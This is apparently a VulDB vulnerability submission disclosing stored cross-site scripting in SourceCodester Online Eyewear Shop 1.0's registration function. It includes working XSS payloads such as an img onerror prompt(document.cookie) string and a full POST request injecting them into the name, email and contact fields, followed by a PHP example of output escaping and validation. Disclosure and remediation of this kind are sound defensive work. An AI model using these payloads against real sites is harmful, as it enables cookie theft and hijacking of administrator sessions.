Submission #85725: SourceCodester Online Eyewear Shop 1.0 Cross-Site Scripting information

Title: SourceCodester Online Eyewear Shop 1.0 Cross-Site Scripting
Description: The application Online Eyewear Shop 1.0 is vulnerable to Stored Cross-Site Scripting attacks. The vulnerability is triggered by sending a specially crafted POST request as a customer user to the following URL:

- http://localhost/oews/classes/Users.php?f=registration

The vulnerable function corresponds to "registration" within the following source code file:

- oews/classes/Users.php

This function registers a new customer user or edits an already existing one. The application does not correctly sanitize the input provided by the user, and the XSS payload "><img src=X onerror=prompt(document.cookie)> can be stored through any of the following parameters:

- "firstname"
- "middlename"
- "lastname"
- "email"
- "contact"

Here is an example of the POST request:

'''
POST /oews/classes/Users.php?f=registration HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------110352294825610921354088773808
Content-Length: 1274
Connection: close
Cookie: PHPSESSID=lmpi80mm6i466es8arcrfj78vo

-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="id"

4
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="firstname"

XSS"><img src=X onerror=prompt(1)>
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="middlename"

"><img src=X onerror=prompt(2)>
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="lastname"

TEST"><img src=X onerror=prompt(3)>
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="gender"

Male
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="email"

[email protected]"><img src=X onerror=prompt(5)>
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="contact"

444"><img src=X onerror=prompt(6)>
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="password"


-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


-----------------------------110352294825610921354088773808--
'''

This set of information is stored inside the database for the current user, and the script is executed any time the related fields are printed out on the website. For this reason, any administrator user could be a potential victim of this attack if she tries to edit that customer or simply accesses the "Customer List View". This view (located at the URL "http://localhost/oews/admin/?page=customers") shows the value of the following fields:

- First Name
- Middle Name
- Last Name
- Email
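The root cause described above is a stored value being echoed into the admin's HTML without output encoding. The following PHP is an added illustration of the vulnerable rendering pattern next to a hardened one; it is not the Online Eyewear Shop code, and the function names (`h`, `validateCustomer`, `renderRowUnsafe`, `renderRowSafe`) and the validation policy for names and contact numbers are assumptions for the example.

```php
<?php
// Added example, not the Online Eyewear Shop project's code.
// Shows why the "Customer List View" executes the stored payload and how
// contextual output encoding (plus input validation) prevents it.
declare(strict_types=1);

/** Escape a value for insertion into an HTML text node or attribute. */
function h(?string $value): string
{
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/**
 * Reject values that should never contain markup before they are stored.
 * The allowed character sets are an assumed policy for this example.
 */
function validateCustomer(array $in): array
{
    $errors = [];
    foreach (['firstname', 'middlename', 'lastname'] as $f) {
        $v = $in[$f] ?? '';
        // Names: letters, spaces, apostrophes and hyphens only
        if ($v !== '' && !preg_match('/^[\p{L} \'\-]{1,60}$/u', $v)) {
            $errors[] = "$f contains disallowed characters";
        }
    }
    if (filter_var($in['email'] ?? '', FILTER_VALIDATE_EMAIL) === false) {
        $errors[] = 'email is not a valid address';
    }
    if (!preg_match('/^\+?[0-9]{6,15}$/', $in['contact'] ?? '')) {
        $errors[] = 'contact must contain digits only';
    }
    return $errors;
}

/** Vulnerable pattern: stored values interpolated straight into the page. */
function renderRowUnsafe(array $c): string
{
    return "<tr><td>{$c['firstname']}</td><td>{$c['email']}</td></tr>";
}

/** Hardened pattern: every dynamic value passes through h() at output time. */
function renderRowSafe(array $c): string
{
    return '<tr><td>' . h($c['firstname']) . '</td><td>' . h($c['email']) . '</td></tr>';
}

// Constructed sample record shaped like the request in the advisory.
$customer = [
    'firstname'  => 'XSS"><img src=X onerror=prompt(1)>',
    'middlename' => '',
    'lastname'   => 'Test',
    'email'      => 'user@example.invalid"><img src=X onerror=prompt(5)>',
    'contact'    => '444"><img src=X onerror=prompt(6)>',
];

print_r(validateCustomer($customer));     // three errors: the record should be rejected
echo renderRowUnsafe($customer), PHP_EOL; // the <img> tag reaches the admin's browser
echo renderRowSafe($customer), PHP_EOL;   // &quot;&gt;&lt;img ... is displayed as text
```

Validation alone is not the fix: an email address or a contact number can legitimately change shape, and other code paths may write the same columns. The durable control is escaping at the point where each value is placed into HTML, so `renderRowSafe` stays correct even if a malformed record reaches the database.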
User: CP_offensive_team (UID 40465)
Submission: 07/02/2023 18:07 (3 years ago)
Moderation: 07/02/2023 20:59 (3 hours later)
Status: Accepted
VulDB entry: 220369 [SourceCodester Online Eyewear Shop 1.0 POST Request oews/classes/Users.php registration firstname/middlename/lastname/email/contact cross site scripting]
Points: 17
